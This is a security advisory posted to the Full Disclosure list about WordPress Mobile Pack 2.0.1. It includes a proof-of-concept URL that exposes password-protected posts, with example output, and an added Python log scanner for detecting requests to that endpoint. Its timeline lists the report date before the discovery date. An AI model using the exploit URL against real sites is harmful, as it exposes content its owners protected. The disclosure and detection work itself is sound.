
List:       full-disclosure
Subject:    [FD] Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password p
From:       dxw Security <security () dxw ! com>
Date:       2014-08-20 10:31:31
Message-ID: 2e7429c47c3828fba573d467076fe39d () security ! dxw ! com

Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password-protected posts

Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password-protected posts (draft and private posts appear not to be affected).

Proof of concept
================

1. Create a password-protected post
2. Enable WordPress Mobile Pack
3. Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
4. Your password-protected post is now visible to everybody in the form of JSON wrapped in "x()"

Example output:
x (
    {
        "articles": [
            {
                "id": 849,
                "title": "Secret post",
                "timestamp": 1406231170,
                "author": "admin",
                "date": "Thu, Jul 24, 2014, 19:46",
                "link": "http://wp.local/?p=849",
                "image": "",
                "description": "<p>HUSH THIS IS A SECRET</p>\n",
                "content": "",
                "category_id": 1,
                "category_name": "Uncategorized"
            }
        ]
    }
)
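As an added example (not part of the advisory or of the plugin), the following Python scans web server access logs in the combined log format for requests to the export script named in the proof of concept above, so a site owner can check whether the endpoint was reached while the vulnerable version was installed. The log lines are constructed for the example; the path and query parameter names come from the proof-of-concept URL.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Export script from the advisory's proof-of-concept URL.
EXPORT_PATH = "/wp-content/plugins/wordpress-mobile-pack/export/content.php"

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(line):
    """Return a finding for a request to the export script, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode %xx escapes and lower-case so an encoded or re-cased path is not missed.
    if unquote(parts.path).lower() != EXPORT_PATH:
        return None
    qs = parse_qs(parts.query)
    content = qs.get("content", [""])[0].lower()
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "content": content,
        "jsonp_callback": qs.get("callback", [None])[0],
        # A 200 for content=exportarticles means the article feed (which on 2.0.1
        # includes password-protected posts) was actually served.
        "served": m.group("status") == "200" and content == "exportarticles",
    }


def scan_log(lines):
    """Findings for every request to the export script, in log order."""
    return [f for f in (classify_request(line) for line in lines) if f]


# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Aug/2014:10:31:31 +0000] "GET /wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x HTTP/1.1" 200 1342 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Aug/2014:10:32:02 +0000] "GET /?p=849 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Aug/2014:10:33:10 +0000] "GET /wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles HTTP/1.1" 404 210 "-" "curl/7.30.0"',
    '203.0.113.9 - - [20/Aug/2014:10:34:45 +0000] "GET /wp-content/plugins/wordpress-mobile-pack/export/Content%2Ephp?content=ExportArticles HTTP/1.1" 200 1342 "-" "python-requests/2.3.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only requests with `served` set to true delivered the feed; a 404 shows the script was probed after the plugin was removed.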

Mitigations
================

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

